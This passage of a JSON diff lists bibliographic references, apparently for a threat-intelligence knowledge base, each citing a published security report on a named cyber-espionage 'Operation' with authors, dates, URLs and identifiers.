Loaders, Installers and Uninstallers Report" + }, + "related": [], + "uuid": "5d3e2f36-3833-4203-9884-c3ff806da286", + "value": "Novetta Blockbuster Loaders" + }, + { + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report. Retrieved March 16, 2016.", + "meta": { + "date_accessed": "2016-03-16T00:00:00Z", + "date_published": "2016-02-24T00:00:00Z", + "refs": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf" + ], + "source": "MITRE", + "title": "Operation Blockbuster: Remote Administration Tools & Content Staging Malware Report" + }, + "related": [], + "uuid": "80d88e80-b5a7-48b7-a999-96b06d082997", + "value": "Novetta Blockbuster RATs" + }, + { + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Tools Report. Retrieved March 10, 2016.", + "meta": { + "date_accessed": "2016-03-10T00:00:00Z", + "date_published": "2016-02-24T00:00:00Z", + "refs": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf" + ], + "source": "MITRE", + "title": "Operation Blockbuster: Tools Report" + }, + "related": [], + "uuid": "6dd1b091-9ace-4e31-9845-3b1091147ecd", + "value": "Novetta Blockbuster Tools" + }, + { + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "meta": { + "date_accessed": "2016-02-25T00:00:00Z", + "date_published": "2016-02-24T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Blockbuster: Unraveling the Long Thread of the Sony Attack" + }, + "related": [], + "uuid": "bde96b4f-5f98-4ce5-a507-4b05d192b6d7", + "value": "Novetta Blockbuster" + }, + { + "description": "Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2015-06-23T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign" + }, + "related": [], + "uuid": "dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f", + "value": "FireEye Clandestine Wolf" + }, + { + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "meta": { + "date_accessed": "2017-09-14T00:00:00Z", + "date_published": "2014-12-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Cleaver" + }, + "related": [], + "uuid": "f0b45225-3ec3-406f-bd74-87f24003761b", + "value": "Cylance Cleaver" + }, + { + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017.", + "meta": { + "date_accessed": "2017-04-05T00:00:00Z", + "date_published": "2017-04-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Cloud Hopper" + }, + "related": [], + "uuid": "fe741064-8cd7-428b-bdb9-9f2ab7e92489", + "value": "PWC Cloud Hopper April 2017" + }, + { + "description": "PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.", + "meta": { + "date_accessed": "2017-04-13T00:00:00Z", + "date_published": "2017-04-01T00:00:00Z", + "refs": [ + "https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf" + ], + "source": "MITRE", + "title": "Operation Cloud Hopper: Technical Annex" + }, + "related": [], + "uuid": "da6c8a72-c732-44d5-81ac-427898706eed", + "value": "PWC Cloud Hopper Technical Annex April 2017" + }, + { + "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.", + "meta": { + "date_accessed": "2018-12-27T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ], + "source": "MITRE", + "title": "Operation Cobalt Kitty" + }, + "related": [], + "uuid": "bf838a23-1620-4668-807a-4354083d69b1", + "value": "Cybereason Cobalt Kitty 2017" + }, + { + "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-05-24T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ], + "source": "MITRE", + "title": "OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP" + }, + "related": [], + "uuid": "1ef3025b-d4a9-49aa-b744-2dbea10a0abf", + "value": "Cybereason Oceanlotus May 2017" + }, + { + "description": "Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.", + "meta": { + "date_accessed": "2022-09-22T00:00:00Z", + "date_published": "2022-05-04T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques" + ], + "source": "MITRE", + "title": "Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques" + }, + "related": [], + "uuid": "fe3e2c7e-2287-406c-b717-cf7721b5843a", + "value": "Cybereason OperationCuckooBees May 2022" + }, + { + "description": "Raiu, C., and Ivanov, A. (2016, June 17). Operation Daybreak. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2016-06-17T00:00:00Z", + "refs": [ + "https://securelist.com/operation-daybreak/75100/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Daybreak" + }, + "related": [], + "uuid": "04961952-9bac-48f3-adc7-40a3a2bcee84", + "value": "Securelist ScarCruft Jun 2016" + }, + { + "description": "Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2014-11-21T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html" + ], + "source": "MITRE", + "title": "Operation Double Tap" + }, + "related": [], + "uuid": "4b9af128-98da-48b6-95c7-8d27979c2ab1", + "value": "FireEye Operation Double Tap" + }, + { + "description": "ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.", + "meta": { + "date_accessed": "2021-12-20T00:00:00Z", + "date_published": "2020-08-13T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf" + ], + "source": "MITRE", + "title": "Operation 'Dream Job' Widespread North Korean Espionage Campaign" + }, + "related": [], + "uuid": "2827e6e4-8163-47fb-9e22-b59e59cd338f", + "value": "ClearSky Lazarus Aug 2020" + }, + { + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "meta": { + "date_accessed": "2021-12-22T00:00:00Z", + "date_published": "2016-02-23T00:00:00Z", + "refs": [ + "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + ], + "source": "MITRE", + "title": "Operation Dust Storm" + }, + "related": [], + "uuid": "001dd53c-74e6-4add-aeb7-da76b0d2afe8", + "value": "Cylance Dust Storm" + }, + { + "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.", + "meta": { + "date_accessed": "2016-01-08T00:00:00Z", + "date_published": "2016-01-07T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation DustySky" + }, + "related": [], + "uuid": "b9e0770d-f54a-4ada-abd1-65c45eee00fa", + "value": "DustySky" + }, + { + "description": "ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.", + "meta": { + "date_accessed": "2016-08-03T00:00:00Z", + "date_published": "2016-06-09T00:00:00Z", + "refs": [ + "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf" + ], + "source": "MITRE", + "title": "Operation DustySky - Part 2" + }, + "related": [], + "uuid": "4a3ecdec-254c-4eb4-9126-f540bb21dffe", + "value": "DustySky2" + }, + { + "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020.", + "meta": { + "date_accessed": "2020-06-09T00:00:00Z", + "date_published": "2019-11-01T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf" + ], + "source": "MITRE", + "title": "Operation ENDTRADE: TICK’s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data" + }, + "related": [], + "uuid": "93adbf0d-5f5e-498e-aca1-ed3eb11561e7", + "value": "Trend Micro Tick November 2019" + }, + { + "description": "Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2013-11-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html" + ], + "source": "MITRE", + "title": "Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method" + }, + "related": [], + "uuid": "68b5a913-b696-4ca5-89ed-63453023d2a2", + "value": "FireEye DeputyDog 9002 November 2013" + }, + { + "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.", + "meta": { + "date_accessed": "2021-03-03T00:00:00Z", + "date_published": "2021-03-02T00:00:00Z", + "refs": [ + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities" + }, + "related": [], + "uuid": "ef0626e9-281c-4770-b145-ffe36e18e369", + "value": "Volexity Exchange Marauder March 2021" + }, + { + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "meta": { + "date_accessed": "2020-09-23T00:00:00Z", + "date_published": "2019-10-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + ], + "source": "MITRE", + "title": "OPERATION GHOST" + }, + "related": [], + "uuid": "fbc77b85-cc5a-4c65-956d-b8556974b4ef", + "value": "ESET Dukes October 2019" + }, + { + "description": "IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2017-05-01T00:00:00Z", + "refs": [ + "http://www.issuemakerslab.com/research3/" + ], + "source": "MITRE", + "title": "Operation GoldenAxe" + }, + "related": [], + "uuid": "10a21964-d31f-40af-bf32-5ccd7d8c99a2", + "value": "IssueMakersLab Andariel GoldenAxe May 2017" + }, + { + "description": "Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.", + "meta": { + "date_accessed": "2016-05-18T00:00:00Z", + "date_published": "2016-05-17T00:00:00Z", + "refs": [ + "http://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ], + "source": "MITRE", + "title": "Operation Groundbait: Analysis of a surveillance toolkit" + }, + "related": [], + "uuid": "218e69fd-558c-459b-9a57-ad2ee3e96296", + "value": "ESET Operation Groundbait" + }, + { + "description": "Fagerland, S., et al. (2013, May). Operation Hangover: Unveiling an Indian Cyberattack Infrastructure. Retrieved September 26, 2016.", + "meta": { + "date_accessed": "2016-09-26T00:00:00Z", + "date_published": "2013-05-01T00:00:00Z", + "refs": [ + "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf" + ], + "source": "MITRE", + "title": "Operation Hangover: Unveiling an Indian Cyberattack Infrastructure" + }, + "related": [], + "uuid": "fd581c0c-d93e-4396-a372-99cde3cd0c7c", + "value": "Operation Hangover May 2013" + }, + { + "description": "Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.", + "meta": { + "date_accessed": "2021-12-20T00:00:00Z", + "date_published": "2020-06-17T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" + ], + "source": "MITRE", + "title": "OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies" + }, + "related": [], + "uuid": "b16a0141-dea3-4b34-8279-7bc1ce3d7052", + "value": "ESET Lazarus Jun 2020" + }, + { + "description": "AhnLab. (2019, February 28). Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2019-02-28T00:00:00Z", + "refs": [ + "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf" + ], + "source": "MITRE", + "title": "Operation Kabar Cobra - Tenacious cyber-espionage campaign by Kimsuky Group" + }, + "related": [], + "uuid": "4035e871-9291-4d7f-9c5f-d8482d4dc8a7", + "value": "AhnLab Kimsuky Kabar Cobra Feb 2019" + }, + { + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ], + "source": "MITRE", + "title": "OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs" + }, + "related": [], + "uuid": "31504d92-6c4d-43f0-8548-ccc3aa05ba48", + "value": "Villeneuve et al 2014" + }, + { + "description": "Villeneuve, N., Bennett, J. T., Moran, N., Haq, T., Scott, M., & Geers, K. (2014). OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/operation-ke3chang-targeted-attacks-against-ministries-of-foreign-affairs" + ], + "source": "MITRE, Tidal Cyber", + "title": "OPERATION “KE3CHANG”: Targeted Attacks Against Ministries of Foreign Affairs" + }, + "related": [], + "uuid": "bb45cf96-ceae-4f46-a0f5-08cd89f699c9", + "value": "Mandiant Operation Ke3chang November 2014" + }, + { + "description": "Ventura, V. (2021, September 16). Operation Layover: How we tracked an attack on the aviation industry to five years of compromise. Retrieved September 15, 2023.", + "meta": { + "date_accessed": "2023-09-15T00:00:00Z", + "date_published": "2021-09-16T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/operation-layover-how-we-tracked-attack/" + ], + "source": "MITRE", + "title": "Operation Layover: How we tracked an attack on the aviation industry to five years of compromise" + }, + "related": [], + "uuid": "f19b4bd5-99f9-54c0-bffe-cc9c052aea12", + "value": "Cisco Operation Layover September 2021" + }, + { + "description": "Falcone, R., et al.. (2015, June 16). Operation Lotus Blossom. Retrieved February 15, 2016.", + "meta": { + "date_accessed": "2016-02-15T00:00:00Z", + "date_published": "2015-06-16T00:00:00Z", + "refs": [ + "https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Lotus Blossom" + }, + "related": [], + "uuid": "46fdb8ca-b14d-43bd-a20f-cae7b26e56c6", + "value": "Lotus Blossom Jun 2015" + }, + { + "description": "Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.", + "meta": { + "date_accessed": "2016-04-01T00:00:00Z", + "date_published": "2013-08-23T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html" + ], + "source": "MITRE", + "title": "OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY" + }, + "related": [], + "uuid": "6b24e4aa-e773-4ca3-8267-19e036dc1144", + "value": "FireEye Operation Molerats" + }, + { + "description": "Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.", + "meta": { + "date_accessed": "2021-12-20T00:00:00Z", + "date_published": "2020-11-05T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/" + ], + "source": "MITRE", + "title": "Operation North Star: Behind The Scenes" + }, + "related": [], + "uuid": "a283d229-3a2a-43ef-bcbe-aa6d41098b51", + "value": "McAfee Lazarus Nov 2020" + }, + { + "description": "Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.", + "meta": { + "date_accessed": "2021-12-20T00:00:00Z", + "date_published": "2020-07-29T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/?hilite=%27Operation%27%2C%27North%27%2C%27Star%27" + ], + "source": "MITRE", + "title": "Operation North Star Campaign" + }, + "related": [], + "uuid": "43581a7d-d71a-4121-abb6-127483a49d12", + "value": "McAfee Lazarus Jul 2020" + }, + { + "description": "Sherstobitoff, R., Malhotra, A. (2018, October 18). ‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group. Retrieved November 30, 2018.", + "meta": { + "date_accessed": "2018-11-30T00:00:00Z", + "date_published": "2018-10-18T00:00:00Z", + "refs": [ + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + ], + "source": "MITRE", + "title": "‘Operation Oceansalt’ Attacks South Korea, U.S., and Canada With Source Code From Chinese Hacker Group" + }, + "related": [], + "uuid": "04b475ab-c7f6-4373-a4b0-04b5d8028f95", + "value": "McAfee Oceansalt Oct 2018" + }, + { + "description": "Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "date_published": "2014-11-03T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" + ], + "source": "MITRE", + "title": "Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement" + }, + "related": [], + "uuid": "1d57b1c8-930b-4bcb-a51e-39020327cc5d", + "value": "FireEye OpPoisonedHandover February 2016" + }, + { + "description": "Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015.", + "meta": { + "date_accessed": "2015-11-04T00:00:00Z", + "date_published": "2014-09-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "OPERATION QUANTUM ENTANGLEMENT" + }, + "related": [], + "uuid": "c94f9652-32c3-4975-a9c0-48f93bdfe790", + "value": "Operation Quantum Entanglement" + }, + { + "description": "Huss, D. & Mesa, M. (2017, August 25). Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2017-08-25T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures" + ], + "source": "MITRE", + "title": "Operation RAT Cook: Chinese APT actors use fake Game of Thrones leaks as lures" + }, + "related": [], + "uuid": "b796f889-400c-440b-86b2-1588fd15f3ae", + "value": "ProofPoint GoT 9002 Aug 2017" + }, + { + "description": "FireEye Labs. (2015, April 18). Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack. Retrieved April 24, 2017.", + "meta": { + "date_accessed": "2017-04-24T00:00:00Z", + "date_published": "2015-04-18T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html" + ], + "source": "MITRE", + "title": "Operation RussianDoll: Adobe & Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack" + }, + "related": [], + "uuid": "6f5986b7-07ee-4bca-9cb1-248744e94d7f", + "value": "FireEye Op RussianDoll" + }, + { + "description": "Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020.", + "meta": { + "date_accessed": "2020-05-28T00:00:00Z", + "date_published": "2013-01-01T00:00:00Z", + "refs": [ + "https://www.mandiant.com/sites/default/files/2021-09/rpt-operation-saffron-rose.pdf" + ], + "source": "MITRE", + "title": "OPERATION SAFFRON ROSE" + }, + "related": [], + "uuid": "2f4c0941-d14e-4eb8-828c-f1d9a1e14a95", + "value": "FireEye Operation Saffron Rose 2013" + }, + { + "description": "Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.", + "meta": { + "date_accessed": "2019-05-01T00:00:00Z", + "date_published": "2018-11-12T00:00:00Z", + "refs": [ + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/WhiteCompanyOperationShaheenReport.pdf?_ga=2.161661948.1943296560.1555683782-1066572390.1555511517" + ], + "source": "MITRE", + "title": "Operation Shaheen" + }, + "related": [], + "uuid": "57802e46-e12c-4230-8d1c-08854a0de06a", + "value": "Cylance Shaheen Nov 2018" + }, + { + "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.", + "meta": { + "date_accessed": "2020-05-14T00:00:00Z", + "date_published": "2018-12-18T00:00:00Z", + "refs": [ + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" + ], + "source": "MITRE", + "title": "Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure" + }, + "related": [], + "uuid": "96b6d012-8620-4ef5-bf9a-5f88e465a495", + "value": "McAfee Sharpshooter December 2018" + }, + { + "description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation SMN: Axiom Threat Actor Group Report" + }, + "related": [], + "uuid": "0dd428b9-849b-4108-87b1-20050b86f420", + "value": "Novetta-Axiom" + }, + { + "description": "Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.", + "meta": { + "date_accessed": "2019-07-18T00:00:00Z", + "date_published": "2019-06-25T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + ], + "source": "MITRE", + "title": "Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers" + }, + "related": [], + "uuid": "620b7353-0e58-4503-b534-9250a8f5ae3c", + "value": "Cybereason Soft Cell June 2019" + }, + { + "description": "Microsoft. (2016, March 26). Operations overview | Graph API concepts. Retrieved June 18, 2020.", + "meta": { + "date_accessed": "2020-06-18T00:00:00Z", + "date_published": "2016-03-26T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview" + ], + "source": "MITRE", + "title": "Operations overview | Graph API concepts" + }, + "related": [], + "uuid": "fed0fef5-e366-4e24-9554-0599744cd1c6", + "value": "Azure AD Graph API" + }, + { + "description": "M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. Retrieved September 16, 2022.", + "meta": { + "date_accessed": "2022-09-16T00:00:00Z", + "date_published": "2021-01-21T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + ], + "source": "MITRE", + "title": "Operation Spalax: Targeted malware attacks in Colombia" + }, + "related": [], + "uuid": "b699dd10-7d3f-4542-bf8a-b3f0c747bd0e", + "value": "ESET Operation Spalax Jan 2021" + }, + { + "description": "Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.", + "meta": { + "date_accessed": "2021-08-18T00:00:00Z", + "date_published": "2021-07-13T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453" + ], + "source": "MITRE", + "title": "Operation SpoofedScholars: A Conversation with TA453" + }, + "related": [], + "uuid": "a987872f-2176-437c-a38f-58676b7b12de", + "value": "Proofpoint TA453 July2021" + }, + { + "description": "Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.", + "meta": { + "date_accessed": "2016-06-08T00:00:00Z", + "date_published": "2016-03-01T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Transparent Tribe" + }, + "related": [], + "uuid": "8e39d0da-114f-4ae6-8130-ca1380077d6a", + "value": "Proofpoint Operation Transparent Tribe March 2016" + }, + { + "description": "Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.", + "meta": { + "date_accessed": "2019-06-14T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf" + ], + "source": "MITRE", + "title": "Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers" + }, + "related": [], + "uuid": "65d1f980-1dc2-4d36-8148-2d8747a39883", + "value": "TrendMicro TropicTrooper 2015" + }, + { + "description": "ClearSky and Trend Micro. (2017, July). Operation Wilted Tulip - Exposing a cyber espionage apparatus. Retrieved May 17, 2021.", + "meta": { + "date_accessed": "2021-05-17T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Operation Wilted Tulip - Exposing a cyber espionage apparatus" + }, + "related": [], + "uuid": "696b12c6-ce1e-4e79-b781-43e0c70f9f2e", + "value": "ClearSky and Trend Micro Operation Wilted Tulip July 2017" + }, + { + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "meta": { + "date_accessed": "2017-08-21T00:00:00Z", + "date_published": "2017-07-01T00:00:00Z", + "refs": [ + "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + ], + "source": "MITRE", + "title": "Operation Wilted Tulip: Exposing a cyber espionage apparatus" + }, + "related": [], + "uuid": "50233005-8dc4-4e91-9477-df574271df40", + "value": "ClearSky Wilted Tulip July 2017" + }, + { + "description": "Bilodeau, O., Bureau, M., Calvet, J., Dorais-Joncas, A., Léveillé, M., Vanheuverzwijn, B. (2014, March 18). Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign. Retrieved February 10, 2021.", + "meta": { + "date_accessed": "2021-02-10T00:00:00Z", + "date_published": "2014-03-18T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" + ], + "source": "MITRE", + "title": "Operation Windigo – the vivisection of a large Linux server‑side credential‑stealing malware campaign" + }, + "related": [], + "uuid": "721cdb36-d3fc-4212-b324-6be2b5f9cb46", + "value": "ESET Windigo Mar 2014" + }, + { + "description": "Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.", + "meta": { + "date_accessed": "2020-10-08T00:00:00Z", + "date_published": "2019-12-19T00:00:00Z", + "refs": [ + "https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf" + ], + "source": "MITRE", + "title": "Operation Wocao: Shining a light on one of China’s 